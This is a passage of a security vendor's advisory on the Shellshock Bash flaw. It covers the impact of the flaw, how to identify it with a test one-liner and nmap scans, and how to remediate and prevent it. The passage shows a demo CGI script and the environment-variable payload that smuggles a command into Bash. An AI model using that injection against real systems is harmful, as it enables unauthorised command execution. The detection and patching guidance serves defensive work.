#!/usr/bin/perl
print "Content-type: text/html\n\n";
exec('/bin/bash -c ifconfig');

Impact

The impact of successful exploitation will vary considerably based on the target host. Configurations that are properly hardened will suffer less immediate impact than those that are not. For example, exploiting the previous CGI script on a current, default Apache installation only results in a compromise of the limited www-data user, as shown below.

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Granted, any level of access is concerning. Even an unprivileged account may be used to obtain sensitive data or fully compromise the system through privilege escalation attacks. However, such a scenario is still far preferable over directly facilitating a full system compromise.

While the above demonstration is currently the most likely attack vector, any service that both allows users to define environment variables and initiates additional Bash sessions is vulnerable to attack. Proof-of-concept exploits are already starting to surface for other services, such as DHCP.

Identification

As one can imagine, the attack vectors for this vulnerability are numerous. Because this flaw is so tightly linked to the underlying operating system, any Unix or Linux service that runs in a Bash environment is potentially vulnerable. However, identifying vulnerable systems on your own is also trivial. In addition to basic version checks, as shown in the first command excerpt, you can simply open a shell and run the following command (Vulnerable systems will print the word “Vulnerable” to the display):

# env SHELLSHOCK="() { :;} ; echo Vulnerable" /bin/bash -c test
Vulnerable

Detection methods, remediation procedures, and exploitation prevention signatures are all in various stages of development, with many vendors already developing and releasing patches. While opening a shell on every Unix/Linux-based network host you’re responsible for may not be feasible, the immediate priority should revolve around identifying accessible Unix/Linux services and conducting further analysis. Public-facing services should be reviewed first, given their significantly greater exposure, with a review of internal services occurring as time and resources allow.

The following two commands will provide an initial list of common Unix, Linux, and OS X/Mac services that are accessible on the specified network range(s), and the underlying host’s operating system should be reviewed for the presence of this vulnerability.

# nmap --open -oG shellshock.gnmap -sV -O <network range(s)>
# grep –i "linux\|unix\|os x\|mac" shellshock.gnmap

You can use virtually any scanner to search for this vulnerability on your network, or write your own based on version or echo checks, but vendors such as Tenable, Rapid7, and Qualys have already rolled out updates to support detection of vulnerable systems.

Remediation

The most effective remediation strategy obviously consists of applying patches to affected systems. Patches already exist for most Linux distributions, such as Red Hat and Debian. As of this writing, OSX v10.9.5 and earlier are vulnerable, and Apple has not provided any information regarding when a patch will be available. However, an immediate workaround does exist, if one is willing to manually recompile Bash on OSX. If the system or device does not allow operating system patches to be applied directly, contact the vendor for such a vulnerable host in order to obtain specific remediation instructions. While Linux is commonly used across a wide range of systems and devices, limited administrative functionality may require firmware updates or other custom remediation procedures.

This vulnerability also presents an opportunity to review systems for unnecessary or unhardened services, such as FTP, Telnet, SSH, HTTP/S, and DHCP. While some services will undoubtedly be immune to this attack, obscure attack vectors will likely continue to surface for the foreseeable future, and a service shouldn’t be considered secure simply because a proof-of-concept exploitation technique doesn’t currently exist.

Unnecessary services should be disabled (or restricted via firewall access-control lists, at a minimum) in order to reduce a host’s overall attack surface. Furthermore, services that must remain accessible should be hardened as much as possible. For example, triggering this condition via SSH requires valid credentials, and implementing keys-based authentication will reduce associated risks further than traditional password-based authentication.

Prevention capabilities will evolve as additional exploits are made public or discovered in the wild. As mentioned earlier, the most likely attack vector is currently via Apache mod_cgi scripts. This is evident by the fact that several proof-of-concept CGI exploits have already surfaced on the web, and a corresponding Metasploit exploit module has also already been developed. However, the defensive side is moving just as fast, and this CGI-based attack vector can be mitigated with mod_security rules published by Red Hat, F5 LineRate (of course, there’s an F5 BIG-IP iRule as well), and Cisco has also updated their signatures to detect and block these attacks. Contact your security control vendors for further information regarding their options for attack prevention.

Finally, be advised that many embedded systems and other devices, including but not limited to printers, security cameras, environmental monitoring solutions, SOHO routers and switches, Network Attached Storage (NAS) devices, and many types of consumer electronics are likely susceptible to this vulnerability as well. Furthermore, these devices could be difficult or even impossible to patch, and as detailed above, access to network services should be disabled or restricted at the bare minimum.

Consumers should be on the lookout for firmware updates from the manufacturers of these devices, and the device and perimeter network configuration should be reviewed to determine which, if any, services are directly exposed to the Internet. Publicly-accessible services in particular should be disabled or restricted in order to avoid exploitation. These random, Internet-accessible devices may pose the largest threat, as they are easy to overlook and may remain accessible and vulnerable for extended periods of time. Research is already underway to convert proof-of-concept exploits into self-propagating worms.

Webinar

For additional information on this subject and the opportunity to ask questions, please click here to register for our Webinar titled:  How Shocking is ‘Shellshock?’, occurring on Sept. 29th, 2pm (EDT).

 

About GuidePoint Security

GuidePoint Security, LLC provides customized, innovative and valuable information security solutions and proven cyber security expertise that enable commercial and federal organizations to successfully achieve their security and business goals. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Reston, Virginia, and with offices in Michigan, New Hampshire, Florida and North Carolina, GuidePoint Security is a small business, and classification can be found with the System for Award Management (SAM). Learn more at: www.guidepointsecurity.com.